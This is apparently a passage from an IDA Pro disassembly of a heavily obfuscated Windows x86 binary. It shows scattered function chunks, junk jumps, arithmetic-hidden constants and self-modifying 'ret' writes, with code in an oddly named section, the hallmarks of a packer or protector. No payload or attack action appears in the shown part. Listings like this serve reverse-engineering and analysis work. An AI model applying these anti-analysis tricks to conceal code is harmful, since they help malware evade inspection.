add eax, 0F03D45C2h
; END OF FUNCTION CHUNK FOR sub_4459EE
; START OF FUNCTION CHUNK FOR sub_446320
loc_43A439: ; CODE XREF: sub_446320:loc_44E6A2j
xchg eax, [esp+0]
jmp sub_439BD1
; END OF FUNCTION CHUNK FOR sub_446320
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_43A442: ; CODE XREF: sub_455DCD-107DEj
jmp loc_44E8FB
; END OF FUNCTION CHUNK FOR sub_455DCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43A447: ; CODE XREF: sub_4503C3:loc_4501DDj
jz loc_43BA1B
jmp loc_44ACDA
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
locret_43A452: ; CODE XREF: ut7h7i2x:loc_44B95Dj
retn
; ---------------------------------------------------------------------------
loc_43A453: ; CODE XREF: ut7h7i2x:00458E59j
jmp loc_447EC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4439B0
loc_43A458: ; CODE XREF: sub_4439B0+6j
jmp nullsub_49
; END OF FUNCTION CHUNK FOR sub_4439B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_43A45D: ; CODE XREF: sub_439AE7:loc_43C91Ej
mov edi, eax
xchg edi, [esp+0]
push esi
push 8D89422Ah
jmp loc_44B24B
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_43A46D: ; CODE XREF: sub_44A3BB:loc_45A713j
jz loc_44BAC0
loc_43A473: ; CODE XREF: ut7h7i2x:00457C3Ej
jmp loc_4401E0
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
add edi, eax
jmp loc_44BABA
; ---------------------------------------------------------------------------
shr edi, 7
jmp sub_43BECE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_429. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43A488: ; DATA XREF: sub_4572A7:loc_4400B0o
push eax
push 0E4B929CAh
pop eax
xor eax, 0A39BDFD5h
sub eax, 9260715Fh
jmp loc_4541B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43A4A0: ; CODE XREF: sub_447CBE-A46Bj
shl edx, 17h
ror eax, 0Ch
jmp loc_4484C7
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_43A4AB: ; CODE XREF: sub_439B67+Dj
sub al, 99h
push 0A1D54AE8h
pop edx
add edx, 0E9612FF2h
xor edx, 0C5668727h
jmp loc_45A3E4
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_43A4C4: ; CODE XREF: sub_459E54-123EEj
shr esi, 8
loc_43A4C7: ; CODE XREF: sub_459E54:loc_447A5Dj
rol edx, 0Bh
add edx, 59234D72h
add edx, ebp
add edx, 0A8DCF2D7h
mov edx, [edx]
xchg edx, [esp+0]
jmp loc_458EF4
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43A4E2: ; CODE XREF: sub_447EB5:loc_43CB50j
pushf
jmp loc_446C4B
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
loc_43A4E8: ; CODE XREF: ut7h7i2x:00454351j
jns locret_44767F
cmp edx, 0ABBE9289h
jmp loc_4495AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_43A4F9: ; CODE XREF: sub_45A8C1-2183Ej
add eax, 0BE6849DBh
mov eax, [eax]
push edx
push 0BA6CCBFAh
pop edx
sub edx, 0E07E4344h
jmp loc_43CC58
; END OF FUNCTION CHUNK FOR sub_45A8C1
; =============== S U B R O U T I N E =======================================
sub_43A513 proc near ; CODE XREF: ut7h7i2x:00448A1Ej
; sub_43CDBA+10F38p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043A36B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B248 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043F0D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441097 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F5E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442DCE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00443D54 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004478CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490C1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044BBCE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044CEA3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CF30 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044FDCA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450E66 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045167E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045217C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00454215 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045769D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004588E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045985C SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-8], eax
loc_43A51A: ; CODE XREF: sub_43CDBA:loc_446F20j
; sub_443A45+1135Dj ...
jno loc_443D5F
jmp loc_45769D
sub_43A513 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, [ebx]
jmp loc_44E3FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F256
loc_43A52C: ; CODE XREF: sub_44F256:loc_439C72j
call sub_44A833
mov eax, [esp+0]
push ebx
push 3CBFF8CCh
pop ebx
loc_43A53B: ; CODE XREF: ut7h7i2x:loc_452157j
xor ebx, 82EAFB1Eh
jmp loc_44A6ED
; END OF FUNCTION CHUNK FOR sub_44F256
; ---------------------------------------------------------------------------
not ebx
cdq
jmp sub_44D406
; ---------------------------------------------------------------------------
loc_43A54E: ; CODE XREF: ut7h7i2x:loc_4493F6j
; DATA XREF: sub_4406F1+8CF0o
mov byte ptr [eax], 0C3h
jmp nullsub_12
; =============== S U B R O U T I N E =======================================
sub_43A556 proc near ; CODE XREF: sub_404DF4+27p
; sub_44A998+9j
; DATA XREF: ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A179 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AC48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BACD SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0043D673 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D771 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE42 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F188 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043F902 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FEDE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044024D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440302 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004403D1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044117E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441F3F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00442152 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044290B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443134 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00443352 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004439EF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443DF7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444573 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445540 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445716 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445B89 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00445CB3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044656C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446700 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446A2D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00447FF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448451 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00448A36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448AE3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A268 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A437 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A76A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044AC5E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B63F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B716 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BBC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C0C3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C334 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CDE1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D0C7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D37A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D78C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D8F3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DA04 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E52F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044F532 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F86B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F91D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044FF11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451398 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453278 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453EE2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004544D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A1A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004567C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456CF0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456EB1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456F5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457739 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458BD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458C25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458FBE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045927D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A065 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A22D SIZE 00000005 BYTES
call sub_45AB7D
loc_43A55B: ; CODE XREF: sub_45883A+19j
jmp loc_445CB3
sub_43A556 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_334. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_43A561: ; CODE XREF: sub_43FA50+145DDj
jmp nullsub_184
; END OF FUNCTION CHUNK FOR sub_43FA50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44749D
loc_43A566: ; CODE XREF: sub_44749D+Fj
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_44749D
; ---------------------------------------------------------------------------
loc_43A56B: ; CODE XREF: ut7h7i2x:00440DD1j
jmp loc_4530E9
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
mov esi, ecx
call sub_4433C5
; START OF FUNCTION CHUNK FOR sub_43F365
loc_43A57B: ; CODE XREF: ut7h7i2x:loc_44482Aj
; sub_43F365:loc_444A03j
call sub_4544E6
loc_43A580: ; CODE XREF: sub_44092D+7DB8j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_43F365
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445822
loc_43A585: ; CODE XREF: sub_445822+1Aj
jmp loc_459AB1
; END OF FUNCTION CHUNK FOR sub_445822
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_43A58A: ; CODE XREF: sub_449D3B-6C2Dj
jmp loc_44D85B
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
cmp ebp, eax
jmp loc_446307
; ---------------------------------------------------------------------------
lea eax, [ebp-8]
push edx
mov edx, eax
xchg edx, [esp]
call sub_4558ED
; START OF FUNCTION CHUNK FOR sub_445CE9
loc_43A5A4: ; CODE XREF: sub_445CE9+Cj
jmp loc_449EBC
; END OF FUNCTION CHUNK FOR sub_445CE9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_256. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43A5AA: ; CODE XREF: sub_4503C3+1j
jmp loc_442A93
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
loc_43A5AF: ; CODE XREF: ut7h7i2x:loc_457A61j
mov [ebx], eax
pop ebx
lea eax, nullsub_78
mov byte ptr [eax], 0C3h
jmp loc_44D6BA
; =============== S U B R O U T I N E =======================================
sub_43A5C0 proc near ; CODE XREF: sub_403209+E0p
; sub_404A3E+FCp ...
; FUNCTION CHUNK AT 0043D93E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442484 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444860 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445A39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045443E SIZE 00000005 BYTES
js loc_444860
mov eax, ds:dword_44CB74
or eax, eax
jmp loc_45443E
sub_43A5C0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_43A5D3: ; CODE XREF: sub_45742F-12AD8j
jge loc_44DFA4
cmp eax, 7FD908D6h
jmp loc_4413A0
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_43A5E4: ; DATA XREF: sub_44602A:loc_449447o
add eax, 0D31F7668h
xchg eax, [esp]
jmp loc_459C67
; ---------------------------------------------------------------------------
shr ebx, 0Bh
jmp sub_4499DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_566. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43A5FB: ; CODE XREF: ut7h7i2x:0044F1E8j
jmp loc_44A73B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_43A600: ; CODE XREF: ut7h7i2x:0043F427j
; sub_456B19:loc_443079j ...
rol edx, 14h
xor edx, 0B9F038DBh
add edx, ebp
add edx, 871E39D0h
mov edx, [edx]
imul byte ptr [edx]
jmp loc_43F4C5
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_43A61A: ; CODE XREF: sub_44F495+9E0j
mov eax, 0B1h
push offset sub_44765F
jmp nullsub_248
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_43A629: ; CODE XREF: sub_4396F5:loc_43AE2Cj
mov [ebp+var_C], eax
shl [ebp+var_8], 8
; END OF FUNCTION CHUNK FOR sub_4396F5
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_43A630: ; CODE XREF: sub_4396F5:loc_44C613j
; sub_43F7A5:loc_450DA3j
jz loc_448E2D
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_44FE95
mov eax, [ebp-8]
call sub_45439C
loc_43A64A: ; CODE XREF: ut7h7i2x:0044860Bj
jbe loc_459601
ror eax, 11h
jmp loc_4393CB
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
loc_43A658: ; CODE XREF: ut7h7i2x:00442899j
push edx
push edi
push 0B3534594h
pop edi
xor edi, 24064FEFh
cmp edi, 298D1218h
jmp loc_44A506
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_43A671: ; CODE XREF: sub_443C4A-21D7j
sub ebp, edi
jmp loc_43BEE5
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
mov esi, [edi]
xor edx, 0BFD22D07h
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_43A680: ; CODE XREF: sub_439FD5:loc_451911j
jmp sub_451E86
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
cmp esi, 3E6128Eh
jmp loc_452157
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43A691: ; CODE XREF: ut7h7i2x:loc_440BF9j
; ut7h7i2x:0045A2FCj
jmp loc_43B508
; ---------------------------------------------------------------------------
loc_43A696: ; CODE XREF: ut7h7i2x:00441047j
jmp loc_4410E5
; ---------------------------------------------------------------------------
loc_43A69B: ; CODE XREF: ut7h7i2x:004494BBj
cmp esi, 0C4F58F97h
jmp loc_440C91
; ---------------------------------------------------------------------------
loc_43A6A6: ; CODE XREF: ut7h7i2x:0044628Bj
jge loc_44C41F
add esi, edx
loc_43A6AE: ; CODE XREF: ut7h7i2x:00446275j
add edx, 9A513144h
test edx, 200000h
jmp loc_43E77B
; ---------------------------------------------------------------------------
jns loc_43F89B
jmp loc_452813
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43A6CA: ; CODE XREF: sub_450FDE-10BC4j
mov edi, [edi]
popf
add edx, edi
pop edi
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
push ebx
jmp loc_4485A9
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43A6DD: ; CODE XREF: sub_43DBEC+14CFFj
ja loc_447700
jge loc_44C40F
and edx, 0AED6AF08h
loc_43A6EF: ; CODE XREF: sub_43DBEC:loc_459554j
call sub_453D8B
mov edx, 3CC6743Ch
call sub_44ED9F
push eax
jmp loc_45A487
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_43A704: ; CODE XREF: ut7h7i2x:0044D34Cj
jz loc_4395E6
jmp loc_44EAA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_43A70F: ; CODE XREF: sub_44261F+98C0j
add edx, 498DDAB0h
or edx, 79A2E4C1h
add edx, 848AD0C7h
mov [edx], eax
pop edx
lea eax, nullsub_5
mov byte ptr [eax], 0C3h
jmp loc_43D5BE
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
loc_43A732: ; CODE XREF: ut7h7i2x:0044B360j
jz loc_45AB72
jmp loc_451B4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43A73D: ; CODE XREF: sub_43DBEC:loc_45332Cj
popf
js loc_446786
jmp loc_4432AC
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_43A749: ; CODE XREF: sub_43CAF4:loc_441B52j
call sub_43BA59
or eax, eax
loc_43A750: ; CODE XREF: ut7h7i2x:loc_458882j
jnz loc_45179E
jmp loc_445C5C
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_43A75B: ; CODE XREF: sub_449808:loc_443F61j
xchg esi, [esp+4+var_4]
jmp loc_447EC6
; END OF FUNCTION CHUNK FOR sub_449808
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_43A763: ; CODE XREF: sub_446F9A+10BCAj
xchg edx, esi
jmp loc_44C39F
; END OF FUNCTION CHUNK FOR sub_446F9A
; =============== S U B R O U T I N E =======================================
sub_43A76A proc near ; CODE XREF: sub_43DAC5+9p
; ut7h7i2x:00453A8Cj
; FUNCTION CHUNK AT 0043ACB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440560 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441C78 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445619 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452236 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453218 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459B68 SIZE 0000001F BYTES
xchg ecx, [esp+0]
pop ecx
cmp al, 0A4h
jz loc_44E823
jmp loc_43ACB1
sub_43A76A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_43A77B: ; CODE XREF: sub_4533DE:loc_4415CFj
jnz loc_43F3CB
loc_43A781: ; CODE XREF: sub_43B4E3+17E1Bj
jmp nullsub_227
; END OF FUNCTION CHUNK FOR sub_4533DE
; ---------------------------------------------------------------------------
loc_43A786: ; CODE XREF: ut7h7i2x:0044B4C0j
jmp loc_44C154
; ---------------------------------------------------------------------------
mov esi, edx
not ebx
cmp esi, ecx
jmp loc_43F3C5
; ---------------------------------------------------------------------------
dw 5E5Ah
dword_43A798 dd 77F50000h ; DATA XREF: sub_446C7B:loc_444706w
; sub_451039:loc_453047w ...
dword_43A79C dd 0 ; DATA XREF: sub_45215F-16F83w
; sub_43DD17+4r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_43A7A0: ; CODE XREF: sub_452B14-D7B5j
; sub_43E68B:loc_44999Dj
jmp loc_44B982
; END OF FUNCTION CHUNK FOR sub_43E68B
; ---------------------------------------------------------------------------
db 3Dh, 92h, 0C3h
dword_43A7A8 dd 77E79F93h ; DATA XREF: sub_45215F:loc_43B1D5w
; sub_43DD17:loc_43D48Fr ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454466
loc_43A7AC: ; CODE XREF: sub_454466-448j
jmp loc_44CAF1
; END OF FUNCTION CHUNK FOR sub_454466
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_43A7B1: ; CODE XREF: sub_439788+B693j
jmp loc_440CD6
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A5A
loc_43A7B6: ; CODE XREF: sub_451A5A-16959j
jmp nullsub_132
; END OF FUNCTION CHUNK FOR sub_451A5A
; ---------------------------------------------------------------------------
db 5Ah
dword_43A7BC dd 0 ; DATA XREF: sub_441F10+Dw
; sub_447E42+4w ...
dword_43A7C0 dd 77E805D8h ; DATA XREF: ut7h7i2x:loc_43EACEr
; sub_4478ED-829Er ...
dword_43A7C4 dd 0F9C6C51Dh ; DATA XREF: sub_4469B9+C5CEr
; ---------------------------------------------------------------------------
loc_43A7C8: ; CODE XREF: ut7h7i2x:0045A022j
jmp sub_444A08
; ---------------------------------------------------------------------------
db 60h, 72h, 40h
dd 0E65DF9C6h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456177
loc_43A7D4: ; CODE XREF: sub_456177+Dj
jmp loc_43B073
; END OF FUNCTION CHUNK FOR sub_456177
; ---------------------------------------------------------------------------
cmp ecx, 0FD9AFD3Bh
jmp loc_455BF3
; ---------------------------------------------------------------------------
add ebx, edi
jmp sub_451BEC
; ---------------------------------------------------------------------------
db 0Fh
dd 94C8Ah
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_43A7F1: ; CODE XREF: sub_4489DF+FDD4j
rol esi, 17h
add esi, 91124669h
add esi, ebp
add esi, 2B251FBAh
mov [esi], eax
pop esi
push offset sub_44670E
jmp nullsub_343
; END OF FUNCTION CHUNK FOR sub_4489DF
; =============== S U B R O U T I N E =======================================
sub_43A80F proc near ; DATA XREF: sub_44F738+1A43o
pop ecx
mov edx, [ebp+8]
imul dword ptr [edx-4]
call sub_446C63
sub_43A80F endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_43A81B: ; CODE XREF: sub_44E5AB-EC30j
jmp loc_44868F
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
rol edi, 9
jmp loc_439C83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43A829: ; CODE XREF: sub_439BF8:loc_456C4Aj
push edx
call sub_45341C
mov eax, 0A4C05BA6h
call sub_43AA94
jmp loc_458BFA
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
or ebx, 0EF0B0BBBh
adc ebp, ecx
jmp sub_442319
; ---------------------------------------------------------------------------
sub ebp, esi
jmp sub_4533DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_43A852: ; CODE XREF: sub_454B2B:loc_44B26Aj
mov eax, [eax]
popf
call sub_44AD25
loc_43A85A: ; CODE XREF: sub_4524FE-160Dj
sub edx, 6A7426EDh
add edx, ds:4000F8h
and edx, 0CDAC140Bh
jnz loc_43F818
; END OF FUNCTION CHUNK FOR sub_454B2B
; START OF FUNCTION CHUNK FOR sub_449D60
loc_43A872: ; CODE XREF: sub_449D60+15j
jmp loc_444870
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
push ebp
adc ebp, 8460E2E7h
jmp loc_44A11B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43A883: ; CODE XREF: sub_457A66-12BC1j
jz loc_440D34
jmp loc_44661B
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_43A88E: ; DATA XREF: sub_452AAF-962o
mov edx, [ebp-14h]
push offset loc_44B351
jmp locret_45892C
; ---------------------------------------------------------------------------
xchg ebx, [eax]
or ecx, 319DC970h
jmp sub_452EED
; ---------------------------------------------------------------------------
loc_43A8A8: ; CODE XREF: ut7h7i2x:loc_43BC9Cj
call sub_457F2D
loc_43A8AD: ; CODE XREF: ut7h7i2x:00455554j
jmp loc_447A77
; ---------------------------------------------------------------------------
loc_43A8B2: ; CODE XREF: ut7h7i2x:0044E4A4j
jmp nullsub_491
; ---------------------------------------------------------------------------
loc_43A8B7: ; CODE XREF: ut7h7i2x:00448B00j
jmp loc_43982C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43A8BC: ; CODE XREF: sub_43CCC3+DE2j
jmp loc_44AFBB
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_43A8C1: ; CODE XREF: ut7h7i2x:0045875Cj
add eax, 4ADFB689h
mov [ebx], edx
loc_43A8C9: ; CODE XREF: ut7h7i2x:loc_450928j
push 0
push 0
jmp loc_44E0E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_43A8D2: ; CODE XREF: sub_455145:loc_44CF67j
jz loc_43C885
loc_43A8D8: ; CODE XREF: sub_43964B+207BFj
jmp sub_43F7A5
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
jno loc_440EA2
cdq
jmp loc_43C880
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_432. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_43A8EA: ; CODE XREF: sub_45410C+2583j
jmp loc_4535C4
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_43A8EF: ; CODE XREF: sub_43E592+132F4j
jmp loc_455360
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
loc_43A8F4: ; CODE XREF: ut7h7i2x:00451CC8j
jp loc_44B3DB
sub eax, 0BC65ED2Fh
jns loc_44A810
jmp loc_447802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C3B7
loc_43A90B: ; CODE XREF: sub_43C3B7+38B3j
mov [ebx], eax
loc_43A90D: ; CODE XREF: sub_442B3B+ACA4j
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_43C3B7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A90F proc near ; CODE XREF: sub_449FD5j
; FUNCTION CHUNK AT 00442EBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E96 SIZE 0000000D BYTES
push ebp
mov ebp, esp
jmp loc_442EBD
sub_43A90F endp
; ---------------------------------------------------------------------------
